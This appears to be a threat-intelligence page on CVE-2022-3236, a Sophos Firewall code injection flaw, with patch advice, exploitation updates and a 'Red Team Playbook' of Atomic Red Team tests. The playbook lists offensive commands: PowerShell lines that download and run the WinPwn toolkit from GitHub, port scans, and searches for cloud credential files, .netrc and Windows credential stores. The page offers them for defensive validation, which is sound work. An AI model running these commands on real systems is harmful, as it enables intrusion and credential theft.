CVE-2022-3236
Overview
This vulnerability is a code injection flaw rooted in improper input validation within Sophos Firewall's User Portal and Webadmin components. Specifically, crafted HTTP POST requests to certain controller endpoints allow injection of arbitrary code due to insufficient sanitization of user-supplied parameters. The affected versions include Sophos Firewall v19.0 MR1 and earlier releases.
Vulnerability Description
A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.
Impact
An unauthenticated remote attacker can execute arbitrary code on the Sophos Firewall system by exploiting this vulnerability, potentially gaining full control over the firewall appliance. This includes the ability to manipulate firewall configurations, intercept or redirect network traffic, and compromise internal network security. The attack requires no user interaction or valid credentials, enabling attackers to breach network defenses and disrupt business operations or exfiltrate sensitive data.
Solution
Sophos has released security updates addressing this vulnerability in versions later than v19.0 MR1. Administrators should apply the patches as detailed in the official Sophos Security Advisory (https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce). It is recommended to upgrade to the latest firmware version provided by Sophos and follow vendor guidance to mitigate exposure until patching is complete.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical code injection vulnerability has been identified in the User Portal and Webadmin of Sophos Firewall versions v19.0 MR1 and earlier. This flaw allows an unauthenticated remote attacker to execute arbitrary code on the affected systems. The root cause of this vulnerability lies in improper validation of user input, which can be exploited to inject malicious code into the application. By leveraging this weakness, attackers can gain unauthorized access to the underlying operating system, potentially leading to complete system compromise. The high severity of this vulnerability is underscored by its CVSS score of 9.8, indicating a significant risk to organizations utilizing affected versions of the firewall.
Attack vectors for this vulnerability are primarily web-based, allowing attackers to target the User Portal and Webadmin interfaces. An attacker could craft a specially designed request that exploits the input validation flaw, leading to the execution of arbitrary commands on the server. This could be accomplished through various means, such as sending crafted HTTP requests or utilizing automated tools to probe for the vulnerability. Once the code is executed, the attacker could manipulate the firewall's configurations, exfiltrate sensitive data, or pivot to other internal systems, thereby expanding their control over the network.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Sophos Firewall for network security. Successful exploitation could result in unauthorized access to sensitive data, disruption of services, and potential loss of customer trust. The business risks associated with such an incident include financial losses from remediation efforts, legal liabilities, and reputational damage. Additionally, organizations may face regulatory scrutiny if sensitive data is compromised, leading to further financial penalties and operational challenges. The potential for widespread exploitation makes it imperative for organizations to take this vulnerability seriously.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is crucial to update to the latest version of Sophos Firewall, which includes patches that address this vulnerability. Regularly applying security updates and patches is a fundamental practice in maintaining a secure environment. Organizations should also conduct thorough security assessments, including vulnerability scanning and penetration testing, to identify any potential weaknesses in their systems. Monitoring network traffic for unusual patterns or unauthorized access attempts can also help in early detection of exploitation attempts.
In addition to technical measures, organizations should invest in employee training and awareness programs to educate staff about the importance of cybersecurity hygiene. This includes recognizing phishing attempts that could lead to exploitation of vulnerabilities and understanding the critical role they play in maintaining the security of the organization's infrastructure. By adopting a proactive security posture and fostering a culture of cybersecurity awareness, organizations can significantly reduce their risk exposure and enhance their overall resilience against potential threats.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2022-3236, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s critical severity and elevates its priority for defensive measures. Our telemetry indicates a significant increase in detection events, reflecting growing adversary interest and potential exploitation attempts in the wild. The emergence of a high EPSS score further corroborates the heightened likelihood of exploitation, signaling that threat actors are actively targeting Sophos Firewall instances running vulnerable versions. Although no new exploit variants have been publicly disclosed, the convergence of these factors substantially raises the threat level. Defenders should consider this vulnerability as an immediate and critical risk, given the potential for remote code execution and the expanding attack surface. The updated risk profile necessitates accelerated attention to patch management and monitoring efforts to mitigate the increased exploitation pressure.
Update 2 — July 13, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-3236, indicating that adversaries are intensifying their targeting of vulnerable Sophos Firewall instances. This surge in telemetry suggests that exploitation attempts are becoming more frequent, increasing the operational tempo of threat actors leveraging this critical remote code execution vulnerability. Although no new exploit variants or ransomware affiliations have been observed, the heightened detection trend underscores an expanding attack surface and a growing likelihood of successful compromise. Consequently, the threat level for this vulnerability has increased, reinforcing its status as a critical risk that demands continued vigilance in monitoring and response efforts.
Update 3 — August 01, 2026
CSURFACE threat intelligence has identified a marked escalation in activity exploiting the CVE-2022-3236 vulnerability in Sophos Firewall. Our telemetry indicates a significant uptick in attempted intrusions targeting this critical remote code execution flaw, reflecting increased adversary interest and operational momentum. Although no novel exploit techniques or ransomware affiliations have surfaced, the intensified exploitation attempts suggest that threat actors are refining their targeting strategies and expanding their attack campaigns. This development elevates the overall threat posture, as the probability of successful compromise has grown in tandem with the surge in observed activity. Defenders should recognize this heightened exploitation trend as an indicator of increased risk exposure and adjust monitoring priorities accordingly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sophos | Firewall | All |
cpe:2.3:a:sophos:firewall:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-3236 |
| sophos.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-3236 |